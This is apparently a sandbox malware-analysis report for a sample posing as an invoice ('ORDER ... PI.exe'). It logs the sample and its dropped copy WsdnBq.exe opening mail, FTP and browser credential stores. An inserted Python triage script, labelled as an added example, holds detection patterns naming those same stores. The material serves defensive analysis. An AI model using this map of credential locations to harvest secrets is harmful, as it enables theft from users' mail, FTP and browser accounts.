Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Users\user\AppData\Roaming\WsdnBq.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Users\user\AppData\Roaming\WsdnBq.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR
Source: Yara match File source: 00000004.00000002.565934222.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.566251641.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: Yara match File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR
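The behaviour lines in this report mix hundreds of volume-information queries against font files and GAC assemblies with the handful of accesses that actually matter for triage: mail-client profiles (Thunderbird, IncrediMail, Outlook), WinSCP and SmartFTP session stores, browser login databases, and the MachineGuid value used to fingerprint the host. The Python script below is an added example, not part of the sandbox report or of the sample: it parses lines in the report's own "Source: <process> <action>: <target>" shape (tolerating the trailing "VolumeInformation" and "Jump to behavior" tokens), suppresses the font and GAC noise, and groups what remains by process and store type, so the two processes' credential-access footprints can be compared at a glance. The category labels (mail, ftp, browser, host_fingerprint) are my own grouping rather than the sandbox's signature names, and the embedded sample is a constructed subset of the entries listed above with one line deliberately repeated to show de-duplication.

```python
"""Triage helper for sandbox behaviour lines (added example, not part of the report).

Parses lines shaped like
    Source: <process path> <action>: <target> [VolumeInformation] [Jump to behavior]
    Source: Yara match File source: <location>, type: <kind>
and separates credential-store accesses from bulk noise.
"""
import re
from collections import defaultdict

BEHAVIOUR_RE = re.compile(
    r"^Source:\s+(?P<source>.+?)\s+"
    r"(?P<action>File opened|Key opened|Key value queried|Queries volume information):\s+"
    r"(?P<target>.+?)"
    r"(?:\s+VolumeInformation)?(?:\s+Jump to behavior)?$"
)
YARA_RE = re.compile(r"^Source:\s+Yara match\s+File source:\s+(?P<where>.+?),\s+type:\s+(?P<kind>\w+)$")

# Locations taken from the report's entries, grouped under labels of my own
# choosing (assumption: these are not the sandbox's signature names).
INDICATORS = tuple(
    (label, re.compile(pattern, re.IGNORECASE))
    for label, pattern in (
        ("mail", r"\\Thunderbird\\profiles\.ini$"),
        ("mail", r"\\IncrediMail\\Identities$"),
        ("mail", r"\\Windows Messaging Subsystem\\Profiles\\Outlook\\"),
        ("ftp", r"\\WinSCP 2\\Sessions$"),
        ("ftp", r"\\SmartFTP\\Client 2\.0\\Favorites\\"),
        ("browser", r"\\Chrome\\User Data\\[^\\]+\\Login Data$"),
        ("browser", r"\\Mozilla\\Firefox\\profiles\.ini$"),
        ("host_fingerprint", r"\\Cryptography MachineGuid$"),
    )
)

# Bulk activity that pads the report without saying much on its own:
# font enumeration and GAC assembly loads.
NOISE = tuple(re.compile(p, re.IGNORECASE) for p in (r"\\Windows\\Fonts\\", r"\\Microsoft\.NET\\assembly\\"))


def classify(target):
    """Return an indicator label, 'noise', or 'unclassified' for one target path or key."""
    for label, pattern in INDICATORS:
        if pattern.search(target):
            return label
    if any(p.search(target) for p in NOISE):
        return "noise"
    return "unclassified"


def triage(lines):
    """Summarise behaviour lines: indicators per process, noise count, Yara hits, leftovers."""
    per_process = defaultdict(lambda: defaultdict(set))
    summary = {"noise": 0, "yara": [], "unclassified": []}
    for raw in lines:
        line = raw.strip()
        m = YARA_RE.match(line)
        if m:
            summary["yara"].append((m.group("where"), m.group("kind")))
            continue
        m = BEHAVIOUR_RE.match(line)
        if not m:
            continue  # headings, legends and other non-behaviour text
        process = m.group("source").rsplit("\\", 1)[-1]
        target = m.group("target")
        label = classify(target)
        if label == "noise":
            summary["noise"] += 1
        elif label == "unclassified":
            summary["unclassified"].append((process, m.group("action"), target))
        else:
            per_process[process][label].add(target)  # a set, so repeated lines collapse
    summary["indicators"] = {
        proc: {label: sorted(targets) for label, targets in labels.items()}
        for proc, labels in per_process.items()
    }
    return summary


def render(summary):
    """Plain-text view of a triage result."""
    out = [f"noise lines suppressed: {summary['noise']}"]
    for proc, labels in sorted(summary["indicators"].items()):
        out.append(f"{proc}:")
        for label, targets in sorted(labels.items()):
            out.append(f"  [{label}]")
            out.extend(f"    {t}" for t in targets)
    for where, kind in summary["yara"]:
        out.append(f"yara: {where} ({kind})")
    return "\n".join(out)


# Constructed sample: a subset of the report's entries, with the first Thunderbird line repeated.
SAMPLE_LINES = [
    r"Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior",
    r"Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior",
    r"Source: Yara match File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR",
    r"Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior",
    r"Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior",
    r"Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior",
    r"Source: C:\Users\user\Desktop\ORDER (6256 OS)#391 PI.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\WsdnBq.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior",
    r"Source: C:\Users\user\AppData\Roaming\WsdnBq.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior",
]

if __name__ == "__main__":
    print(render(triage(SAMPLE_LINES)))
```

Feeding the full report text to triage() works the same way: headings and legend lines simply fail both regexes and are skipped, and anything that lands in "unclassified" (for example the sample querying volume information on its own executable) is the list worth reading by hand.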

Remote Access Functionality

Source: Yara match File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR
Source: Yara match File source: 00000004.00000002.565934222.0000000002C20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.566251641.00000000032BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: ORDER (6256 OS)#391 PI.exe PID: 1948, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: WsdnBq.exe PID: 1328, type: MEMORYSTR
[Map legend, number of IPs per region: < 25%, 25-50%, 50-75%, > 75%]